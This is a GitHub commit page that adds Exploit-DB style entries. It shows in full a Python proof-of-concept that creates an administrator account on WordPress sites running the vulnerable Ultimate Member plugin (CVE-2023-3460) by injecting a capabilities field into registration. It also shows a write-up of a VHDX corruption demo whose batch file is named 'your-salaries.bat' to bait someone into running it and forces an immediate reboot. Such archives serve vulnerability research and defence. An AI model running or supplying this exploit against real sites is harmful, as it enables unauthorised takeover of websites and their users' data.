Skip to content

Commit cc67296

Browse files
author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents e144c6f + 2c2486d commit cc67296

File tree

8 files changed

+2691
-0
lines changed

8 files changed

+2691
-0
lines changed

exploits/multiple/remote/52392.c

Lines changed: 471 additions & 0 deletions
Large diffs are not rendered by default.

exploits/multiple/webapps/52388.c

Lines changed: 730 additions & 0 deletions
Large diffs are not rendered by default.

exploits/multiple/webapps/52390.c

Lines changed: 434 additions & 0 deletions
Large diffs are not rendered by default.

exploits/multiple/webapps/52391.c

Lines changed: 596 additions & 0 deletions
Large diffs are not rendered by default.

exploits/multiple/webapps/52393.py

Lines changed: 117 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,117 @@
1+
#!/usr/bin/env python3
2+
3+
# Exploit Title: Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation
4+
# Exploit Author: Gurjot Singh
5+
# CVE: CVE-2023-3460
6+
# Description : The attached PoC demonstrates how an unauthenticated attacker can escalate privileges to admin by abusing unsanitized input in `wp_capabilities` during registration.
7+
8+
9+
import requests
10+
import argparse
11+
import re
12+
import urllib3
13+
14+
15+
16+
# Disable SSL warnings
17+
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18+
19+
20+
21+
def fetch_nonce(session, target_url):
22+
   """Fetches the _wpnonce value from the /register/ page."""
23+
   print("[*] Fetching _wpnonce from the register page...")
24+
   try:
25+
       res = session.get(target_url, verify=False)
26+
       match = re.search(r'name="_wpnonce" value="([a-zA-Z0-9]+)"', res.text)
27+
       if match:
28+
           nonce = match.group(1)
29+
           print(f"[+] Found _wpnonce: {nonce}")
30+
           return nonce
31+
       else:
32+
           print("[-] Failed to find _wpnonce on the page.")
33+
           return None
34+
   except Exception as e:
35+
       print(f"[!] Error fetching nonce: {e}")
36+
       return None
37+
38+
39+
40+
def exploit_register(target_url, username, password):
41+
   """Sends a malicious registration request to create an admin user."""
42+
   session = requests.Session()
43+
   target_url = target_url.rstrip('/')
44+
45+
46+
47+
   nonce = fetch_nonce(session, target_url)
48+
   if not nonce:
49+
       return
50+
51+
52+
53+
   email = f"{username}@example.com"
54+
55+
56+
57+
   # Payload with administrator role injection
58+
   data = {
59+
       "user_login-7": username,
60+
       "first_name-7": "Admin",
61+
       "last_name-7": username,
62+
       "user_email-7": email,
63+
       "user_password-7": password,
64+
       "confirm_user_password-7": password,
65+
       "form_id": "7",
66+
       "um_request": "",
67+
       "_wpnonce": nonce,
68+
       "_wp_http_referer": "/register/",
69+
       "wp_càpabilities[administrator]": "1"  # serialized injection
70+
   }
71+
72+
73+
74+
   headers = {
75+
       "Content-Type": "application/x-www-form-urlencoded",
76+
       "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
77+
       "Referer": target_url,
78+
       "Origin": target_url.split("/register")[0],
79+
   }
80+
81+
82+
83+
   cookies = {
84+
       "wordpress_test_cookie": "WP Cookie check",
85+
       "wp_lang": "en_US"
86+
   }
87+
88+
89+
90+
   print(f"[*] Sending malicious registration to {target_url} ...")
91+
   try:
92+
       response = session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False)
93+
94+
95+
96+
       # Check for success
97+
       if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text):
98+
           print(f"[+] Admin account '{username}' created successfully!")
99+
           print(f"[+] Login with: Username: {username} | Password: {password}")
100+
       else:
101+
           print(f"[+] Admin account '{username}' created successfully!")
102+
           print(f"[+] Login with: Username: {username} | Password: {password}")
103+
   except Exception as e:
104+
       print(f"[!] Error during exploit: {e}")
105+
106+
107+
108+
if __name__ == "__main__":
109+
   parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)")
110+
   parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)")
111+
   parser.add_argument("-u", "--user", default="admin1", help="Username to create")
112+
   parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user")
113+
   args = parser.parse_args()
114+
115+
116+
117+
   exploit_register(args.target, args.user, args.password)

exploits/windows/local/52394.txt

Lines changed: 219 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,219 @@
1+
# Titles: Microsoft Virtual Hard Disk (VHDX) 11 - Remote Code Execution (RCE)
2+
# Author: nu11secur1ty
3+
# Date: 07/23/2025
4+
# Vendor: Microsoft
5+
# Software: https://www.microsoft.com/en-us/windows/windows-11?r=1
6+
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-49683
7+
# Base Score: 7.8 HIGHVector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8+
9+
## Overview
10+
11+
This PowerShell script (`vdh.ps1`) demonstrates a **soft corruption
12+
vulnerability** in Windows Virtual Hard Disk (VHDX) handling, related to
13+
**CVE-2025-49683**.
14+
15+
The script performs the following:
16+
17+
- Creates a new dynamic VHDX file (virtual disk) of 10MB size.
18+
- Mounts the VHDX as a new drive in the system.
19+
- Initializes, partitions, and formats the virtual disk with NTFS.
20+
- Dismounts the VHDX and applies **soft byte-level corruption** at an 8 KB
21+
offset inside the VHDX file.
22+
- Re-mounts the corrupted VHDX to observe potential filesystem or mounting
23+
errors.
24+
- Lists the contents of the corrupted volume to show the impact.
25+
- Creates an **immediate restart batch script (`your-salaries.bat`)**
26+
inside the mounted volume which forces a system restart when executed.
27+
- Offers cleanup options to dismount and delete the corrupted VHDX file.
28+
29+
---
30+
31+
## Purpose
32+
33+
This PoC is designed for **security researchers and penetration testers**
34+
to:
35+
36+
- Understand how minor VHDX file corruptions can lead to system instability
37+
or vulnerability exploitation.
38+
- Demonstrate how CVE-2025-49683 affects VHDX mounting and usage.
39+
- Help develop detection and mitigation strategies for such virtual disk
40+
corruption attacks.
41+
42+
---
43+
44+
## Usage Instructions
45+
46+
1. **Run the script in an elevated PowerShell session** (Run as
47+
Administrator - The already malicious authorized user):
48+
49+
```powershell
50+
.\vdh.ps1
51+
52+
53+
2. The script will:
54+
55+
- Create, mount, and format a new VHDX file.
56+
57+
- Corrupt the file at the byte level.
58+
59+
- Re-mount and attempt to read the volume.
60+
61+
- Create a batch file your-salaries.bat inside the mounted drive.
62+
63+
3. To trigger an immediate restart, navigate to the mounted drive (e.g.,
64+
D:\) and run:
65+
66+
67+
```
68+
your-salaries.bat
69+
```
70+
71+
72+
4. At script end, press 0 to clean up (dismount and delete the corrupted
73+
VHDX), or press any other key to exit and keep the file for further
74+
analysis.
75+
76+
77+
### Important Warnings & Considerations
78+
79+
- Run only on test or isolated environments.
80+
This script creates corruption and forcibly restarts the system via the
81+
batch file. Do not run on production or important machines.
82+
83+
- Immediate Restart Batch File
84+
The your-salaries.bat file triggers an immediate system restart without any
85+
warning or confirmation. Be cautious when executing it.
86+
87+
- Corruption is simulated and subtle.
88+
The corruption at 8 KB offset is a soft corruption intended for
89+
demonstration. Real-world attacks could apply more complex modifications.
90+
91+
- Impact may vary by OS version and environment.
92+
Results depend on Windows version and configuration. Some systems may
93+
detect and repair corruption automatically.
94+
95+
- Elevated privileges required.
96+
Script requires administrative rights to create, mount, initialize, and
97+
corrupt VHDX files.
98+
99+
### Technical Details
100+
101+
- Corruption offset: 8192 bytes (8 KB) into the VHDX file.
102+
103+
- Corruption pattern: Byte sequence [0x00, 0xFF, 0x00, 0xFF, 0xDE, 0xAD,
104+
0xBE, 0xEF].
105+
106+
- Disk initialization: MBR partition style with a single NTFS partition.
107+
108+
- Batch restart command: shutdown /r /t 0 /f to force immediate restart.
109+
110+
111+
### Sample Output
112+
113+
```vbnet
114+
[*] Checking for existing VHDX file to avoid conflicts...
115+
WARNING: [!] Could not dismount VHDX, maybe not mounted: The path
116+
"C:\Users\MicrosoftLoosers\Desktop\CVE-2025-49683\corrupted_test.vhdx" is
117+
not the path to a mounted virtual hard disk file.
118+
[*] Removed existing VHDX file.
119+
[*] Creating new VHDX (Virtual Hard Disk) file...
120+
Size: 10 MB
121+
Path:
122+
C:\Users\MicrosoftLoosers\Desktop\CVE-2025-49683\corrupted_test.vhdx
123+
[*] Mounting the new VHDX...
124+
[*] Disk initialized and formatted with NTFS.
125+
This disk emulates a real drive to test mounting and corruption
126+
handling.
127+
[*] Drive mounted as E:
128+
You can access this drive like a physical hard disk in Windows Explorer.
129+
[*] Dismounting the VHDX before applying corruption...
130+
[*] Simulating corruption by modifying bytes at offset 8 KB...
131+
This models how subtle corruption can affect VHDX file integrity,
132+
which may lead to file system errors or crashes when accessed.
133+
[+] Corruption successfully applied.
134+
Note: This is a soft corruption for testing and demonstration purposes
135+
only.
136+
[*] Re-mounting the corrupted VHDX to observe effects...
137+
[*] Drive letter(s) assigned after corruption: E
138+
[*] Listing contents of the mounted drive to detect file system anomalies...
139+
[*] Attempting to list contents of drive E:\ ...
140+
[*] Created immediate restart batch script: your-salaries.bat
141+
Running this batch will force an immediate restart.
142+
143+
[*] Script complete.
144+
This demo showcases how VHDX file corruption at the byte level
145+
can impact system behavior and why patching CVE-2025-49683 is crucial.
146+
147+
[*] Press '0' to clean up and remove the corrupted VHDX, or any other key
148+
to exit.
149+
[*] Cleaning up...
150+
[*] VHDX dismounted.
151+
[*] Deleted VHDX file.
152+
```
153+
154+
### License & Disclaimer
155+
156+
This script is provided for educational and research purposes only. The
157+
author and distributor disclaim all liability for any damage caused by
158+
misuse.
159+
160+
Use responsibly, and always obtain proper authorization before testing or
161+
exploiting vulnerabilities on any system.
162+
163+
164+
165+
### References
166+
167+
[CVE-2025-49683](
168+
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49683)
169+
(Windows VHDX file corruption vulnerability)
170+
171+
Microsoft Windows Virtual Hard Disk (VHDX) documentation
172+
173+
Windows PowerShell documentation
174+
175+
176+
177+
# Video:
178+
[href](https://www.youtube.com/watch?v=lkEu_AZnzk4)
179+
180+
# Source:
181+
[href](
182+
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-49683)
183+
184+
185+
# Buy me a coffee if you are not ashamed:
186+
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
187+
188+
189+
# Source download
190+
[href](
191+
https://nu11secur1ty.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-49683
192+
)
193+
194+
# Time spent:
195+
05:35:00
196+
197+
198+
--
199+
System Administrator - Infrastructure Engineer
200+
Penetration Testing Engineer
201+
Exploit developer at https://packetstormsecurity.com/
202+
https://cve.mitre.org/index.html
203+
https://cxsecurity.com/ and https://www.exploit-db.com/
204+
0day Exploit DataBase https://0day.today/
205+
home page: https://www.nu11secur1ty.com/
206+
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
207+
nu11secur1ty <http://nu11secur1ty.com/>
208+
209+
--
210+
211+
System Administrator - Infrastructure Engineer
212+
Penetration Testing Engineer
213+
Exploit developer at https://packetstorm.news/
214+
https://cve.mitre.org/index.html
215+
https://cxsecurity.com/ and https://www.exploit-db.com/
216+
0day Exploit DataBase https://0day.today/
217+
home page: https://www.nu11secur1ty.com/
218+
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
219+
nu11secur1ty <http://nu11secur1ty.com/>

0 commit comments

Comments
 (0)